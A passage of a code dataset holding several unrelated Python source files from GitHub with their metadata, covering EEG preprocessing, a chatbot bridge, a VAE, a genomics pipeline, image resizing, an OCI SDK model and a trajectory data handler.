frequencies[0] \n \n seizure_times = getSeizureTimes(curr_file_name, file_type=\"edf\")\n seizure_times = seizure_times[seizure_idx]\n start_t = int(freq * seizure_times[0])\n end_t = int(freq * seizure_times[1])\n curr_signals = signals[:, start_t:end_t]\n \n f._close() \n \n # dense features, only for training split\n dense_feats = []\n for sampling_idx in range(TRAIN_INCREASES):\n dense_param = DENSE_PARAMS[sampling_idx]\n dense_feats.append(denseSampling(ordered_channels, curr_signals, dense_param[0], dense_param[1], dense_param[2]))\n \n write_file_name = curr_file_name + '_' + str(seizure_idx)\n print(write_file_name)\n features[write_file_name] = dense_feats \n\n # Write into h5py file\n train_h5_file = os.path.join(output_dir, 'fold' + str(fold_idx) + '_train_features.h5')\n with h5py.File(train_h5_file, 'w') as hf:\n for key, val in features.items():\n hf.create_dataset(key, data = val)\n \n ##### TEST SET #####\n for idx in range(len(test_file_tuples)):\n curr_file_name, seizure_class, seizure_idx = test_file_tuples[idx]\n # read file\n f = pyedflib.EdfReader(curr_file_name)\n \n ordered_channels = getOrderedChannels(curr_file_name, False, f.getSignalLabels())\n \n signals = getEDFsignals(f)\n \n frequencies = getSamplingFreq(f, ordered_channels)\n freq = frequencies[0] \n \n seizure_times = getSeizureTimes(curr_file_name, file_type=\"edf\")\n seizure_times = seizure_times[seizure_idx]\n start_t = int(freq * seizure_times[0])\n end_t = int(freq * seizure_times[1])\n curr_signals = signals[:, start_t:end_t]\n \n f._close()\n \n write_file_name = curr_file_name + '_' + str(seizure_idx)\n print(write_file_name)\n features[write_file_name] = denseSampling(ordered_channels, curr_signals, 96, test_w, test_o)\n\n # Write into h5py file\n test_h5_file = os.path.join(output_dir, 'fold' + str(fold_idx) + '_test_features.h5')\n with h5py.File(test_h5_file, 'w') as hf:\n for key, val in features.items():\n hf.create_dataset(key, data = val)\n\nif __name__ == '__main__':\n main(NUM_FOLDS)", "repo_name": "DanielLongo/eegML", "sub_path": "tsy935/RubinLab_neurotranslate_eeg-master/eeg/preprocess_cv.py", "file_name": "preprocess_cv.py", "file_ext": "py", "file_size_in_byte": 4880, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 12, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.random.seed", 
"line_number": 8, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 8, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "h5py.File", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 118, "usage_type": "call"}, {"api_name": "os.path", "line_number": 118, "usage_type": "attribute"}, {"api_name": "h5py.File", "line_number": 119, "usage_type": "call"}]} +{"seq_id": "2253115698", "text": "from ChatBot import *\nclass FAQ(object):\n\n\n def __init__(self, question = None ,answer = None):\n self.question = question\n self.answer = answer\n\n #Serilize the String into Pickle File\n def serialize(self):\n serialize()\n\n def setQuestion(self, question = None ):\n self.question = question\n\n def getQuestion(self):\n return self.question\n\n # Chatbot will analysis the question, then return the Answer\n def setAnswer(self, question = None):\n if self.question:\n chatbot = ChatBot()\n print(\"I am here\")\n data = list(faqs.keys())\n with open('faq_feats.pkl', 'rb') as f:\n feats = pickle.load(f)\n input_results = chatbot.input_question(data, feats, self.question)\n new_data = input_results[0]\n new_feats = input_results[1]\n distance_matrix = chatbot.calculate_distances(new_feats)\n idx = 0\n self.answer = chatbot.similarity_text(idx, distance_matrix, new_data)\n else:\n self.answer = \"Please tell me what can I do for you?\"\n\n def getAnswer(self):\n return self.answer\n\n #Connect to the Java File\n class Java:\n implements = [\"py4j.examples.Chatbot\"]\n\n# Make sure that the python code is started first.\n# Then execute: java -cp py4j.jar py4j.examples.SingleThreadClientApplication\nfrom py4j.java_gateway import JavaGateway, CallbackServerParameters\nfaq = FAQ()\n\n#Start the Python Server and Connect Java By Port: 25334 (Default)\ngateway = JavaGateway(callback_server_parameters=CallbackServerParameters(),python_server_entry_point=faq)\n", "repo_name": "DanielProjectJourney/ChatBotFAQ", "sub_path": "Python_Connect_Java_Version/Python/FAQ.py", "file_name": "FAQ.py", "file_ext": "py", "file_size_in_byte": 1656, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "py4j.java_gateway.JavaGateway", "line_number": 49, "usage_type": "call"}, {"api_name": "py4j.java_gateway.CallbackServerParameters", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "36637107355", "text": "\"\"\"Train VAE to reproduce sequence frequencies\n\"\"\"\n\nimport argparse\nfrom torch import save as tsave, load as tload, optim, no_grad, log as tlog, diag\nfrom torch import set_num_threads, cuda, device as tdevice, argmax, randn, float as tfloat\nfrom torch import eye as teye, cat as tcat, zeros as tzeros, no_grad, tensor, randn_like\n\nfrom torch.autograd import set_detect_anomaly\nfrom torch.utils.data import DataLoader\nfrom torch.distributions import MultivariateNormal\n\nfrom .model_vae import VAE_seq\nfrom .seq_io import encode_align, decode_index\n\nfrom numpy import zeros, array, sum as npsum, exp, eye as teye, diag, mean\nfrom numpy.random import uniform\n\nfrom 
torch.utils.data import Dataset, DataLoader\n\nclass MSA(Dataset):\n\n def __init__(self, seq_list):\n bmsa = encode_align(seq_list)\n self.data = tensor(bmsa, dtype=tfloat)\n\n def __getitem__(self, index):\n return self.data[index]\n\n def __len__(self):\n return len(self.data)\n\n\ndef init_model(len_seq, device=None):\n \"\"\"Default model parameters\n \"\"\"\n nb_state = 21\n dim_node = len_seq * nb_state\n nb_hid = 1\n dim_hid = 2**9\n dim_lat = 2**7\n model = VAE_seq(dim_node, nb_state=nb_state, nb_hid=nb_hid, dim_hid=dim_hid,\n dim_lat=dim_lat, device=device)\n return model\n\n\ndef train_model(seq_list, model, bsize=100, lr=10**-3, nb_iter=100, init_parms=None):\n if init_parms is not None:\n model.load_state_dict(tload(init_parms, map_location=model.dev))\n\n out_file = \"parms/parms_{}.dat\"\n model.train()\n # get the data\n optimizer = optim.Adam(model.parameters(), weight_decay=0.01)\n bin_msa = MSA(seq_list)\n\n loss_epoch = []\n for epoch in range(nb_iter):\n loader = DataLoader(bin_msa, batch_size=bsize, shuffle=True)\n loss_batch = []\n for bi, batch in enumerate(loader):\n optimizer.zero_grad()\n loss = -model(batch)\n loss.backward()\n optimizer.step()\n loss_batch += [loss.item()]\n loss_epoch += [mean(loss_batch)]\n return loss_epoch\n\n\ndef generate_seq(model, nb_seq, no_gap=False, scale_var=1.):\n \"generate random sequences\"\n z_ls = randn(nb_seq, model.dim_lat)\n\n seq = model.decoder(z_ls.float())\n seq = seq.reshape(nb_seq, model.nb_pos, 21)\n\n if no_gap:\n max_p = argmax(seq[:, :, :-1], -1)\n else:\n max_p = argmax(seq, -1)\n\n return decode_index(max_p)\n", "repo_name": "vaiteaopuu/structural_bioinfo", "sub_path": "practicals/src/svd/vae.py", "file_name": "vae.py", "file_ext": "py", "file_size_in_byte": 2436, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.utils.data.Dataset", "line_number": 21, "usage_type": "name"}, {"api_name": "seq_io.encode_align", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 25, "usage_type": "name"}, {"api_name": "model_vae.VAE_seq", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 54, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 81, "usage_type": "call"}, {"api_name": "seq_io.decode_index", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "94447104", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nimport logging\nimport argparse\n\nfrom grandte.config import *\nfrom grandte.common import check_path, mkdir, read_tsv\nfrom dagflow import DAG, Task, do_dag\n\nLOG = logging.getLogger(__name__)\n__version__ = \"1.0.0\"\n__author__ = (\"Xingguo Zhang\",)\n__email__ = \"invicoun@foxmail.com\"\n__all__ = []\n\n\ndef create_grandTE_task(prefix, genome, job_type, work_dir, out_dir):\n\n task = Task(\n id=\"grandTE_%s\" % prefix,\n work_dir=work_dir,\n type=\"local\",\n option=\"-pe smp 1\",\n script=\"\"\"\n{root}/grandte.py all 
\\\\\n--prefix {prefix} --genome {genome} \\\\\n--thread 1 --job_type {job_type} \\\\\n--work_dir {work}/{prefix} --out_dir {out}/{prefix}\n\"\"\".format(root=ROOT,\n prefix=prefix,\n genome=genome,\n job_type=job_type,\n work=work_dir,\n out=out_dir\n )\n )\n\n return task\n\n\ndef class_te(tes, job_type, work_dir, out_dir):\n\n task = Task(\n id=\"class\",\n work_dir=work_dir,\n type=job_type,\n option=\"-pe smp 1\",\n script=\"\"\"\n{script}/class_stat_transposon.py {tes}\ncp *_transposon.tsv {out_dir}\n{script}/plot_transposon.py {tes} \nmv all_transposon.png Length_all_transposon.png\nmv all_transposon.pdf Length_all_transposon.pdf\n{script}/plot_transposon.py {tes} --model number\nmv all_transposon.png Number_all_transposon.png\nmv all_transposon.pdf Number_all_transposon.pdf\ncp *_all_transposon.png *_all_transposon.pdf {out_dir}\n\"\"\".format(script=SCRIPTS,\n tes=tes,\n out_dir=out_dir\n )\n )\n\n return task\n\n\ndef run_grand_multi(genomes, work_dir, out_dir, concurrent, refresh, job_type=\"local\"):\n\n work_dir = mkdir(work_dir)\n out_dir = mkdir(out_dir)\n genomes = check_path(genomes)\n\n dag = DAG(\"grand_multi\")\n class_task = class_te(\n tes=os.path.join(out_dir, \"*/06_repeat/*.stat_transposon.tsv\"),\n job_type=job_type,\n work_dir=work_dir,\n out_dir=out_dir\n )\n dag.add_task(class_task)\n\n for line in read_tsv(genomes):\n genome = check_path(line[1])\n task = create_grandTE_task(\n prefix=line[0],\n genome=genome,\n job_type=job_type,\n work_dir=work_dir,\n out_dir=out_dir\n )\n dag.add_task(task)\n class_task.set_upstream(task) \n\n do_dag(dag, concurrent, refresh)\n\n return 0\n\n\ndef grand_multi(args):\n\n run_grand_multi(\n genomes=args.genomes,\n work_dir=args.work_dir,\n out_dir=args.out_dir,\n concurrent=args.concurrent,\n refresh=args.refresh,\n job_type=args.job_type,\n )\n\n\ndef add_grand_multi_args(parser):\n\n parser.add_argument(\"genomes\", metavar='FILE', type=str,\n help=\"Input the genome list.\")\n parser.add_argument(\"--concurrent\", metavar=\"INT\", type=int, default=10,\n help=\"Maximum number of jobs concurrent (default: 10).\")\n parser.add_argument(\"--refresh\", metavar=\"INT\", type=int, default=30,\n help=\"Refresh time of log in seconds (default: 30).\")\n parser.add_argument(\"--job_type\", choices=[\"sge\", \"local\"], default=\"local\",\n help=\"Jobs run on [sge, local] (default: local).\")\n parser.add_argument(\"--work_dir\", metavar=\"DIR\", type=str, default=\".\",\n help=\"Work directory (default: current directory).\")\n parser.add_argument(\"--out_dir\", metavar=\"DIR\", type=str, default=\".\",\n help=\"Output directory (default: current directory).\")\n\n return parser\n\n\ndef main():\n\n logging.basicConfig(\n stream=sys.stderr,\n level=logging.INFO,\n format=\"[%(levelname)s] %(message)s\"\n )\n\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description=\"\"\"\nattention:\n grand.py multi genomes.list\nFile format:\nname genome\n\nversion: %s\ncontact: %s <%s>\\\n \"\"\" % (__version__, \" \".join(__author__), __email__))\n\n parser = add_grand_multi_args(parser)\n args = parser.parse_args()\n grand_multi(args)\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "zxgsy520/grandTE", "sub_path": "grandte/grand_multi.py", "file_name": "grand_multi.py", "file_ext": "py", "file_size_in_byte": 4082, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 12, 
"usage_type": "call"}, {"api_name": "dagflow.Task", "line_number": 21, "usage_type": "call"}, {"api_name": "dagflow.Task", "line_number": 45, "usage_type": "call"}, {"api_name": "grandte.common.mkdir", "line_number": 71, "usage_type": "call"}, {"api_name": "grandte.common.mkdir", "line_number": 72, "usage_type": "call"}, {"api_name": "grandte.common.check_path", "line_number": 73, "usage_type": "call"}, {"api_name": "dagflow.DAG", "line_number": 75, "usage_type": "call"}, {"api_name": "grandte.common.read_tsv", "line_number": 84, "usage_type": "call"}, {"api_name": "grandte.common.check_path", "line_number": 85, "usage_type": "call"}, {"api_name": "dagflow.do_dag", "line_number": 96, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 133, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 134, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 135, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 139, "usage_type": "call"}, {"api_name": "argparse.RawDescriptionHelpFormatter", "line_number": 140, "usage_type": "attribute"}]} +{"seq_id": "40307354114", "text": "import numpy as np\nfrom skimage.transform import resize, SimilarityTransform, warp\nfrom skimage.util import invert\nfrom PIL import Image\nimport matplotlib.pyplot as plt\n\ndef img_resize(img):\n\n #inverting the image\n img = invert(img)\n row, col = img.shape\n pad=400\n tmp = np.zeros((row+2*pad, col+2*pad)).astype(int)\n tmp[pad:pad+row,pad:pad+col] = img\n\n zY, zX = np.where(tmp)\n # bounding rectangle left upper coordinate\n ly, lx = zY.min(), zX.min()\n # bounding rectangle right bottom coordinate\n ry, rx = zY.max(), zX.max()\n\n\n if (rx-lx) < (ry-ly):\n rx = lx+(ry-ly)\n\n if (rx-lx) > (ry-ly):\n ry = ly+(rx-lx)\n\n img = resize(tmp[ly:ry,lx:rx].astype(float), (20, 20))\n # Now inserting the 20x20 image\n tmp = np.zeros((28,28))\n tmp[0:20,0:20] = img\n\n # Calculating translation\n \n Y, X = np.where(tmp)\n R, C = tmp.shape\n\n tsy, tsx = np.round(R/2-Y.mean()), np.round(C/2-X.mean())\n # Moving the digit\n tf = SimilarityTransform(translation=(-tsx, -tsy))\n tmp = warp(tmp, tf)\n tmp = np.round(tmp).astype(int)\n return tmp\n \n \n\n\n\nif __name__ == '__main__':\n \n img = Image.open('test_img/five.png').convert('L')\n img_arr = np.array(img)\n print(img_arr)\n res_img_arr = img_resize(img_arr)\n print(res_img_arr)\n plt.imshow(res_img_arr, cmap=plt.get_cmap('gray'))\n plt.show()\n ", "repo_name": "AshirwadPradhan/Web_App_Digit_Recognizer", "sub_path": "util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 1390, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "skimage.util.invert", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 16, "usage_type": "call"}, {"api_name": "skimage.transform.resize", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 39, "usage_type": "call"}, {"api_name": "skimage.transform.SimilarityTransform", "line_number": 41, "usage_type": "call"}, {"api_name": "skimage.transform.warp", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 43, "usage_type": "call"}, {"api_name": "PIL.Image.open", 
"line_number": 52, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 52, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.get_cmap", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}]} +{"seq_id": "31575320729", "text": "from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401\nfrom oci.decorators import init_model_state_from_kwargs\n\n\n@init_model_state_from_kwargs\nclass InfluxDetails(object):\n \"\"\"\n Possible data sources\n \"\"\"\n\n #: A constant which can be used with the influx_version property of a InfluxDetails.\n #: This constant has a value of \"V_1_8\"\n INFLUX_VERSION_V_1_8 = \"V_1_8\"\n\n #: A constant which can be used with the influx_version property of a InfluxDetails.\n #: This constant has a value of \"V_2_0\"\n INFLUX_VERSION_V_2_0 = \"V_2_0\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initializes a new InfluxDetails object with values from keyword arguments. This class has the following subclasses and if you are using this class as input\n to a service operations then you should favor using a subclass over the base class:\n\n * :class:`~oci.ai_anomaly_detection.models.InfluxDetailsV1v8`\n * :class:`~oci.ai_anomaly_detection.models.InfluxDetailsV2v0`\n\n The following keyword arguments are supported (corresponding to the getters/setters of this class):\n\n :param influx_version:\n The value to assign to the influx_version property of this InfluxDetails.\n Allowed values for this property are: \"V_1_8\", \"V_2_0\", 'UNKNOWN_ENUM_VALUE'.\n Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n :type influx_version: str\n\n \"\"\"\n self.swagger_types = {\n 'influx_version': 'str'\n }\n\n self.attribute_map = {\n 'influx_version': 'influxVersion'\n }\n\n self._influx_version = None\n\n @staticmethod\n def get_subtype(object_dictionary):\n \"\"\"\n Given the hash representation of a subtype of this class,\n use the info in the hash to return the class of the subtype.\n \"\"\"\n type = object_dictionary['influxVersion']\n\n if type == 'V_1_8':\n return 'InfluxDetailsV1v8'\n\n if type == 'V_2_0':\n return 'InfluxDetailsV2v0'\n else:\n return 'InfluxDetails'\n\n @property\n def influx_version(self):\n \"\"\"\n **[Required]** Gets the influx_version of this InfluxDetails.\n Data source type where actually data asset is being stored\n\n Allowed values for this property are: \"V_1_8\", \"V_2_0\", 'UNKNOWN_ENUM_VALUE'.\n Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n\n\n :return: The influx_version of this InfluxDetails.\n :rtype: str\n \"\"\"\n return self._influx_version\n\n @influx_version.setter\n def influx_version(self, influx_version):\n \"\"\"\n Sets the influx_version of this InfluxDetails.\n Data source type where actually data asset is being stored\n\n\n :param influx_version: The influx_version of this InfluxDetails.\n :type: str\n \"\"\"\n allowed_values = [\"V_1_8\", \"V_2_0\"]\n if not value_allowed_none_or_none_sentinel(influx_version, allowed_values):\n influx_version = 'UNKNOWN_ENUM_VALUE'\n self._influx_version = influx_version\n\n def 
__repr__(self):\n return formatted_flat_dict(self)\n\n def __eq__(self, other):\n if other is None:\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n return not self == other\n", "repo_name": "oracle/oci-python-sdk", "sub_path": "src/oci/ai_anomaly_detection/models/influx_details.py", "file_name": "influx_details.py", "file_ext": "py", "file_size_in_byte": 3465, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 345, "dataset": "github-code", "pt": "52", "api": [{"api_name": "oci.util.value_allowed_none_or_none_sentinel", "line_number": 88, "usage_type": "call"}, {"api_name": "oci.util.formatted_flat_dict", "line_number": 93, "usage_type": "call"}, {"api_name": "oci.decorators.init_model_state_from_kwargs", "line_number": 5, "usage_type": "name"}]} +{"seq_id": "26876851061", "text": "#!/usr/bin/env python\nimport sys\nimport numpy as np\nfrom scipy.linalg import hankel\n\nif sys.version_info[0] < 3:\n sys.path.append('../src/data_utils')\n import Support as sup\n from DataHandler import *\nelse:\n import src.data_utils.Support as sup\n from src.data_utils.DataHandlerLSTM import *\n\nclass DataHandler_Keras(DataHandlerLSTM):\n def __init__(self, args):\n super().__init__(args)\n self.tbpl = self.prev_horizon+1\n \n # Batches size redefinition\n self.batch_grid = np.zeros((self.batch_size, self.prev_horizon+1, int(self.args.submap_width / self.args.submap_resolution),\n int(self.args.submap_height / self.args.submap_resolution)))\n self.batch_x = np.zeros((self.batch_size, self.prev_horizon+1, self.args.input_dim))\n self.batch_vel = np.zeros((self.batch_size, self.prev_horizon+1, self.args.input_state_dim))\n self.batch_pos = np.zeros((self.batch_size, self.prev_horizon+1, self.args.input_state_dim))\n self.batch_goal = np.zeros((self.batch_size, self.prev_horizon+1, 2))\n self.other_agents_info = np.zeros((self.batch_size, self.prev_horizon+1, self.args.pedestrian_vector_dim))\n self.other_agents_pos = np.zeros((self.batch_size, self.prev_horizon+1, self.args.pedestrian_vector_state_dim))\n self.other_agents_vel = np.zeros((self.batch_size, self.prev_horizon+1, self.args.pedestrian_vector_state_dim))\n self.batch_y = np.zeros((self.batch_size, self.prediction_horizon, self.args.output_dim))\n self.pedestrian_grid = np.zeros([self.batch_size, self.tbpl, self.pedestrian_vector_dim])\n\n def getBatch(self):\n \"\"\"\n \t\tGet the next batch of training data.\n \t\t\"\"\"\n # Update sequences\n # If batch sequences are empty and need to be filled\n trajectory = []\n if len(self.batch_sequences) == 0:\n for b in range(0, min(self.batch_size, len(self.trajectory_set))):\n id, trajectory = self.trajectory_set[self.data_idx]\n self.data_idx += 1\n self.batch_sequences.append(trajectory)\n self.batch_ids.append(id)\n # If batch sequences are filled and can be used or need to be updated.\n other_agents_pos = []\n new_epoch = False\n for ii, traj in enumerate(self.batch_sequences):\n if self.sequence_idx[ii] + self.tbpl + self.output_sequence_length + 1 >= len(traj):\n id, trajectory = self.trajectory_set[self.data_idx]\n self.data_idx = (self.data_idx + 1) % int(len(self.trajectory_set) * self.train_set)\n if self.data_idx == 0:\n new_epoch = True\n self.batch_sequences[ii] = trajectory\n self.batch_ids[ii] = id\n self.sequence_idx[ii] = self.args.prev_horizon\n self.sequence_reset[ii] = 1\n else:\n self.sequence_reset[ii] = 0\n\n # Fill the batch\n other_agents_pos = []\n for ii in range(0, min(self.batch_size, len(self.trajectory_set) - 
len(self.trajectory_set) % self.batch_size)):\n traj = self.batch_sequences[ii]\n agent_id = self.batch_ids[ii]\n other_agents_pos.append(\n self.fillBatch(agent_id, ii, int(self.sequence_idx[ii]), self.tbpl, self.batch_x, self.batch_vel,\n self.batch_pos, self.batch_grid, self.pedestrian_grid, self.batch_goal, self.batch_y,\n traj, centered_grid=self.centered_grid))\n self.sequence_idx[ii] += self.tbpl\n \n batch = {\n 'x': self.batch_x,\n 'vel': self.batch_vel,\n 'pos': self.batch_pos,\n 'goal': self.batch_goal,\n 'grid': self.batch_grid,\n 'other_agents_info': self.other_agents_info,\n 'y': self.batch_y,\n 'other_agents_pos': self.other_agents_pos,\n 'other_agents_vel': self.other_agents_vel,\n 'new_epoch': new_epoch\n }\n return batch\n\n def fillBatch(self, agent_id, batch_idx, start_idx, truncated_backprop_length, batch_x, batch_vel, batch_pos,\n batch_grid, pedestrian_grid, batch_goal, batch_y, trajectory, centered_grid=False):\n \"\"\"\n\t\t\t\tFill the data batches of batch_idx with data for all truncated backpropagation steps.\n\t\t\t\t\"\"\"\n\n for prev_step in range(self.prev_horizon,-1,-1):\n\n # Input values\n current_pos = np.array([trajectory.pose_vec[start_idx - prev_step, 0], trajectory.pose_vec[start_idx - prev_step, 1]])\n current_vel = np.array([trajectory.vel_vec[start_idx - prev_step, 0] , trajectory.vel_vec[start_idx - prev_step, 1]])\n\n if self.args.normalize_data:\n self.normalize_pos(current_pos)\n self.normalize_vel(current_vel)\n\n batch_x[batch_idx, prev_step, :] = np.array([current_pos[0],current_pos[1],current_vel[0],current_vel[1]])\n batch_vel[batch_idx, prev_step, :] = np.array([current_vel[0],current_vel[1]])\n\n heading = math.atan2(current_vel[1], current_vel[0])\n\n # Find positions of other pedestrians at the current timestep\n other_poses = trajectory.other_agents_positions[start_idx - prev_step]\n other_agents_pos = other_poses\n n_other_agents = other_poses.shape[0]\n if n_other_agents>0:\n other_velocities = trajectory.other_agents_velocities[start_idx - prev_step]\n other_pos_local_frame = sup.positions_in_local_frame(current_pos, heading, other_poses)\n\n # TODO: it only works for one agent now\n rel_pos = other_poses - current_pos\n rel_vel = other_velocities - current_vel\n distance = np.linalg.norm(rel_pos)\n pedestrian_grid[batch_idx, prev_step, :] = np.concatenate(\n (np.array([np.linalg.norm(rel_pos)]), rel_vel[0]))\n\n # Output values\n for pred_step in range(self.output_sequence_length):\n vx = trajectory.vel_vec[start_idx +1+ pred_step, 0]\n vy = trajectory.vel_vec[start_idx +1+ pred_step, 1]\n px = trajectory.pose_vec[start_idx +1+ pred_step, 0]\n py = trajectory.pose_vec[start_idx +1+ pred_step, 1]\n batch_y[batch_idx, pred_step, 0] = vx\n batch_y[batch_idx, pred_step, 1] = vy\n if self.args.normalize_data:\n self.normalize_vel(batch_y[batch_idx, pred_step,:])\n batch_pos[batch_idx, pred_step, 0] = px\n batch_pos[batch_idx, pred_step, 1] = py\n\n return other_agents_pos\n \n def getTrajectoryAsBatch(self, trajectory_idx, max_sequence_length=1000,unit_testing=False):\n \"\"\"\n Get a trajectory out of the trajectory set in the same format as for the standard training data\n (e.g. 
for validation purposes).\n \"\"\"\n if unit_testing:\n traj = self.test_trajectory_set[trajectory_idx][1]\n else:\n traj = self.trajectory_set[trajectory_idx][1]\n\n sequence_length = min(max_sequence_length, len(traj) - self.prediction_horizon) - self.prev_horizon\n \n # Old data structures, used for plotting\n batch_x = np.zeros([sequence_length,self.prev_horizon+1, self.args.input_dim]) # data fed for training\n batch_pos = np.zeros([sequence_length,self.prev_horizon+1, self.args.input_state_dim]) # data fed for training\n batch_vel = np.zeros([sequence_length,self.prev_horizon+1, self.args.input_state_dim]) # data fed for training\n batch_goal = np.zeros([sequence_length, 2])\n batch_target = np.zeros([sequence_length, self.prediction_horizon,self.args.output_dim ])\n\n other_agents_info = np.zeros([sequence_length, self.prev_horizon+1, self.args.pedestrian_vector_dim])\n batch_grid = np.zeros((sequence_length, int(self.args.submap_width / self.args.submap_resolution),\n int(self.args.submap_height / self.args.submap_resolution)))\n n_other_agents = traj.other_agents_positions[0].shape[0]\n other_agents_pos = np.zeros((sequence_length, n_other_agents,self.args.pedestrian_vector_state_dim))\n other_agents_vel = np.zeros((sequence_length, self.args.pedestrian_vector_state_dim))\n \n # New data structures, fed to the network\n batch_vel_seq = np.zeros([sequence_length, self.prev_horizon+1, self.args.input_state_dim])\n other_agents_info_seq = np.zeros([sequence_length, self.prev_horizon+1, self.args.pedestrian_vector_dim])\n\n for batch_idx in range(sequence_length):\n other_agents_pos[batch_idx,:,:] = self.fillBatch(id, batch_idx, self.prev_horizon+batch_idx, sequence_length, batch_x, batch_vel, batch_pos,\n batch_grid, other_agents_info, batch_goal, batch_target, traj,\n centered_grid=self.centered_grid)\n\n batch = {\n 'x': batch_x,\n 'vel': batch_vel,\n 'pos': batch_pos,\n 'goal': batch_goal,\n 'grid': batch_grid,\n 'other_agents_info': other_agents_info,\n 'y': batch_target,\n 'other_agents_pos': other_agents_pos,\n 'other_agents_vel': other_agents_vel,\n 'traj': traj,\n 'vel_seq': batch_vel_seq,\n 'other_agents_info_seq': other_agents_info_seq\n }\n return batch\n \n \ndef expand_sequence(sequence_array, horizon): \n # Sequence array has shape [features, time steps]\n # Expanded sequence will have shape [time steps, horizon, features]\n expanded_sequence = np.zeros((sequence_array.shape[1]-horizon+1,\\\n horizon,\\\n sequence_array.shape[0]))\n \n for i in range(sequence_array.shape[0]): # For each feature\n sequence = sequence_array[i, :]\n expanded_sequence[:, :, i] = hankel(sequence[0:horizon],\\\n sequence[horizon-1:]).transpose()\n \n return expanded_sequence\n\n\ndef reduce_sequence(hankel_matrix):\n aux = []\n for feature_idx in range(hankel_matrix.shape[2]):\n aux.append( np.concatenate([hankel_matrix[0, :, feature_idx], hankel_matrix[1:, -1, feature_idx]], axis = 0) )\n return np.stack(aux, axis = 1)\n", "repo_name": "eliatrevisan/IA-MPPI-LBM", "sub_path": "src/data_utils/DataHandler_Keras.py", "file_name": "DataHandler_Keras.py", "file_ext": "py", "file_size_in_byte": 10473, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.version_info", "line_number": 6, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 7, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 20, "usage_type": 
